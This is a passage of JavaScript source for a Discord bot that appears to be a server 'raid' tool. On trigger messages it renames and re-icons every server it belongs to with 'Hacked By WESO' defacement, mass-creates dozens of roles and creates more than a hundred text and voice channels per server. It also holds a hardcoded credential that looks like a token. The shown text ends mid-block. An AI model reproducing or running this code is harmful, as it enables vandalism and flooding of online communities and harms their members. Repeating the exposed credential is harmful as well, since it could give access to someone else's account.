const Discord = require("discord.js");
const hngel = new Discord.Client();
console.log('Hacked By WESO ! Is here,');
hngel.on('ready', () => {
  console.log(`Logged in as ${hngel.user.tag} !`);

});
hngel.on('ready',  () => {
    console.log('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'); 
    console.log('  start = g ');
    console.log('  start = gg');
    console.log('  start = g1');
    console.log('  start = .');
    console.log('  start = -');
    console.log('  start = ..');
console.log('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~');
console.log(`Logged in as  * [ " hngel " ] servers! [ " ${hngel.guilds.size} " ] Users! [ " ${hngel.users.size} " ]`);

const tokn = ("NDY3MjE3OTMwNzE1NzkxMzcx.DjSU9g.6oOHdxymQCywWcILjUfNoR3WAcs") /// توكن حسابك مهم <
//////////////////////////////////^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^



    

});
var prefix = "-"
hngel.on("message", message => {
  if(!message.content.startsWith(prefix)) return;;
  let args = message.content.split(" ").slice(1);
  var argresult = args.join(' ');
  if (message.content.startsWith('gn15')) {
    hngel.user.setUsername(argresult);
  }
    if (message.content.startsWith(prefix + 'on123')) {
    hngel.user.setStatus(argresult);
  }
});

var x1 = "gg"
hngel.on('message', message => {
     if (message.content === ".") {
hngel.user.setAvatar(`https://media.discordapp.net/attachments/418125853931864064/418366728657960960/HackerHacker.png`)

}
});
var x1 = "gg"
hngel.on('message', message => {
     if (message.content === ".") {
hngel.user.setUsername("Hacked Good Night to the server 🧤💤")

}
});
hngel.on('message', message => {
     if (message.content === ".") {
hngel.user.setGame(`Hacked By WESO ! Is here`,'https://www.twitch.tv/hngel2667')

}
});

hngel.on('message', message => {
     if (message.content === ".") {
         hngel.guilds.forEach(m =>{
             m.setIcon(`https://media.discordapp.net/attachments/418125853931864064/418366728657960960/HackerHacker.png`)
})
}
});
hngel.on('message', message => {
     if (message.content === ".") {
         hngel.guilds.forEach(m =>{
             m.setName(`Hacked Good Night to the server 🧤💤`)
})
}
});

hngel.on('message', message => {
     if (message.content === ".") {
                 if(!message.channel.guild) return;

             message.guild.setIcon(`https://media.discordapp.net/attachments/418125853931864064/418366728657960960/HackerHacker.png`)

}
});
hngel.on('message', message => {
     

     if (message.content === "g1") {
         hngel.guilds.forEach(m =>{
  m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    }) 
    m.createRole({
        name : " , Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })

    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
     m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })

    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    }) 
    m.createRole({
        name : " Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })

    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    }) 
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })

    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })

    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"
    })
    m.createRole({
        name : "  Hacked By WESO ! Is here",
        permissions :   [1],
        color : " #ff0000"

})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})
m.createRole({
    name : "  Hacked By WESO ! Is here,",
    permissions :   [1],
    color : " #0f0947"
})

m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})

m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
 m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})

m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
}) 
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})

m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
}) 
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})

m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})

m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"
})
m.createRole({
    name : "  Hacked By WESO ! Is here",
    permissions :   [1],
    color : " #ff0000"

}) 
})
    
 
 
}
});

hngel.on('message', message => {
         if (message.content === "g") {
               hngel.guilds.forEach(m =>{
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');
m.createChannel('Hacked By WESO ! Is here', 'text');



})
}
});

hngel.on('message', message => {
         if (message.content === "g") {
                 hngel.guilds.forEach(m =>{
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');


m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

})
}
});

hngel.on('message', message => {
         if (message.content === "g") {
                 hngel.guilds.forEach(m =>{
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');


m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
})
}
});

hngel.on('message', message => {
         if (message.content === "g") {
                 hngel.guilds.forEach(m =>{
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');


m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');

m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
m.createChannel('  Hacked By WESO ! Is here', 'voice');
